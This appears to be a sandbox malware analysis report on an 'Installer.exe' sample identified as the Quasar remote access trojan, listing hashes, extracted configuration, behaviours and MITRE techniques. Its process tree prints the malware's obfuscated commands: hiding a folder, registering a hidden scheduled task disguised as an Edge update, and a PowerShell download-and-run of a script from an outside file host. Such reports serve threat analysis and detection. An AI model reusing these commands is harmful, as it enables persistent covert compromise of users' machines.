quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer.exe
Size

53KB
MD5

f323bb458ecbd21acdddd5ea770e775f
SHA1

9b04a6ea2e6efcc81d344f6425928c5700e9a3f6
SHA256

4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926
SHA512

ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2
SSDEEP

768:ZId0rRueeCTXZJa0CMpWBUlNP/hA8OE2fbsE/g0+EFiRs:ZId+KQXZPCiWBU8fAL5eim

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/4328-58-0x000001E198640000-0x000001E1987CE000-memory.dmp	family_quasar

Blocklisted process makes network request 39 IoCs

flow	pid	Process
20	1620	powershell.exe
24	4328	powershell.exe
25	4328	powershell.exe
26	4328	powershell.exe
59	4328	powershell.exe
60	4328	powershell.exe
63	4328	powershell.exe
64	4328	powershell.exe
27	4328	powershell.exe
65	4328	powershell.exe
66	4328	powershell.exe
67	4328	powershell.exe
28	4328	powershell.exe
29	4328	powershell.exe
30	4328	powershell.exe
31	4328	powershell.exe
32	4328	powershell.exe
33	4328	powershell.exe
34	4328	powershell.exe
35	4328	powershell.exe
42	4328	powershell.exe
68	4328	powershell.exe
69	4328	powershell.exe
70	4328	powershell.exe
71	4328	powershell.exe
75	4328	powershell.exe
76	4328	powershell.exe
77	4328	powershell.exe
78	4328	powershell.exe
79	4328	powershell.exe
80	4328	powershell.exe
81	4328	powershell.exe
82	4328	powershell.exe
83	4328	powershell.exe
84	4328	powershell.exe
85	4328	powershell.exe
86	4328	powershell.exe
87	4328	powershell.exe
88	4328	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1860	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4328	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1860	powershell.exe
1860	powershell.exe
1620	powershell.exe
1620	powershell.exe
4328	powershell.exe
4328	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1064	Installer.exe
Token: SeBackupPrivilege	1064	Installer.exe
Token: SeDebugPrivilege	1064	Installer.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe
Token: 34	1860	powershell.exe
Token: 35	1860	powershell.exe
Token: 36	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe
Token: 34	1860	powershell.exe
Token: 35	1860	powershell.exe
Token: 36	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4328	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 2908	1064	Installer.exe	88
PID 1064 wrote to memory of 2908	1064	Installer.exe	88
PID 2908 wrote to memory of 2964	2908	cmd.exe	89
PID 2908 wrote to memory of 2964	2908	cmd.exe	89
PID 2964 wrote to memory of 2584	2964	winAPI.dll	90
PID 2964 wrote to memory of 2584	2964	winAPI.dll	90
PID 2584 wrote to memory of 60	2584	cmd.exe	91
PID 2584 wrote to memory of 60	2584	cmd.exe	91
PID 60 wrote to memory of 3688	60	cmd.exe	92
PID 60 wrote to memory of 3688	60	cmd.exe	92
PID 60 wrote to memory of 1860	60	cmd.exe	93
PID 60 wrote to memory of 1860	60	cmd.exe	93
PID 60 wrote to memory of 1620	60	cmd.exe	97
PID 60 wrote to memory of 1620	60	cmd.exe	97
PID 60 wrote to memory of 4328	60	cmd.exe	102
PID 60 wrote to memory of 4328	60	cmd.exe	102
PID 4328 wrote to memory of 1968	4328	powershell.exe	105
PID 4328 wrote to memory of 1968	4328	powershell.exe	105
PID 1968 wrote to memory of 1188	1968	csc.exe	106
PID 1968 wrote to memory of 1188	1968	csc.exe	106

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3688	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:60
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:3688
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1620
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4328
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jy1hs04r\jy1hs04r.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C6A.tmp" "c:\Users\Admin\AppData\Local\Temp\jy1hs04r\CSC6BDB563A2E4B2F9BAE7C3375DBAC51.TMP"
        8⤵
        
        PID:1188

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac187482ba33704d4342ed8a68978aa8

SHA1
466f64f3f134a1bf39b28cfe2e7a7c479c01ab11

SHA256
2bb4572b32c6eafd545e47be1ac369e5214e750519a299a099c232862a58b7c5

SHA512
54f33f399764756ff538b7b6a7677ad9d4d05973770a987b7a2ad93efdcd65dea32cd337148acfb5af3b7c9d94be2f38c73392b4c8b333b198a7a71b346b560d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0e970ce30f6c2a7e38e5380439554504

SHA1
4533f341f72bc5b4de8d342a0068fff8edcd64f3

SHA256
c375d7582aebe7aa5ccf220827c7b3e28f0cbe1c406ccc09c55d4737465be459

SHA512
07960e2a5327e86eabb472fc488cdcae246ab1a8b6db1942ea29041fc53303a825edefd40bd6cef66b9458bc523ce9b8d6764a745f2913bbed13119488ea1336

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2C6A.tmp

Filesize
1KB

MD5
3c0da626a91ffabe2da175efdc7d940a

SHA1
30802453499e578a6d59171cd153aa36c7c13272

SHA256
51218547e1056786574cc0f80d9b28dffe424b547670b932e4a704137559b741

SHA512
10f4aca7b4127f3f07b9ede9857c03a94234b3e3e8a861d23d0cf73194b3143f39eb7f4f4580393a96fed72817506d63d5c6fc1f146811dcc7f8a475e82eb945

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kebni2lx.oug.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jy1hs04r\jy1hs04r.dll

Filesize
3KB

MD5
663c818bae19cf0f6c7f0f68f13fb15a

SHA1
f4bed7eceae86d8b086e3020a22c13cc7b1ab36f

SHA256
5ad2193c59eb2b6a01a0afc068271f423892629f5000de5d04df121bd6a97eb4

SHA512
c5b6137fc196dfb501ec1c5dd3555a3ee0e5a3658fcaa706ea436b28f82d7afb053d582c14ecba78f40b5a88281dc95bd182d11169fc091efe1fa5aabdcf6df5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jy1hs04r\CSC6BDB563A2E4B2F9BAE7C3375DBAC51.TMP

Filesize
652B

MD5
53de575eb68c2c4111ed3f78375b4b0d

SHA1
e1cb5608b663621e5a26eb52ed94254255246afb

SHA256
1f5880e4647db4debbcafe9c592b6bbbf5f382ef70a50d1e2947819a616a4082

SHA512
f0dc277511294a7b616683122dd8dc7a01fb010c21f2e0d04cc2f6bfd49c879fc11ef1f73bb74ce86abbe7493dc345c1c9e4c614edc3d5671aaa01db73e4a125

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jy1hs04r\jy1hs04r.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jy1hs04r\jy1hs04r.cmdline

Filesize
369B

MD5
7dfffdb372f366a4da9f3be2cc6c6657

SHA1
6d60d1e1902c57332102516d7328007fd3424093

SHA256
ee19e4e9c246612d35773561aacaef4779031108f5f6be3402a328000db79517

SHA512
c2c31e27450853313f4255665a5ca540445e14ce165309e9ecb4be22cb17480f740adcb46abe75de7fa99873eb99845b4976f730deb797161a6ad1f5e35192c6

Download Submit
memory/1064-28-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/1064-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/1064-27-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download
memory/1860-9-0x00000191EF150000-0x00000191EF172000-memory.dmp

Filesize
136KB

Download
memory/4328-59-0x000001E1984B0000-0x000001E1984CA000-memory.dmp

Filesize
104KB

Download
memory/4328-58-0x000001E198640000-0x000001E1987CE000-memory.dmp

Filesize
1.6MB

Download
memory/4328-56-0x000001E198020000-0x000001E19818A000-memory.dmp

Filesize
1.4MB

Download
memory/4328-54-0x000001E198000000-0x000001E198008000-memory.dmp

Filesize
32KB

Download
memory/4328-60-0x000001E1985D0000-0x000001E1985E2000-memory.dmp

Filesize
72KB

Download
memory/4328-63-0x000001E1F30D0000-0x000001E1F3182000-memory.dmp

Filesize
712KB

Download
memory/4328-64-0x000001E1988C0000-0x000001E19890E000-memory.dmp

Filesize
312KB

Download
memory/4328-67-0x000001E1985A0000-0x000001E1985CA000-memory.dmp

Filesize
168KB

Download
memory/4328-66-0x000001E198960000-0x000001E1989AA000-memory.dmp

Filesize
296KB

Download
memory/4328-65-0x000001E198910000-0x000001E19895C000-memory.dmp

Filesize
304KB

Download
memory/4328-62-0x000001E1F2FC0000-0x000001E1F3010000-memory.dmp

Filesize
320KB

Download
memory/4328-61-0x000001E1985E0000-0x000001E19861A000-memory.dmp

Filesize
232KB

Download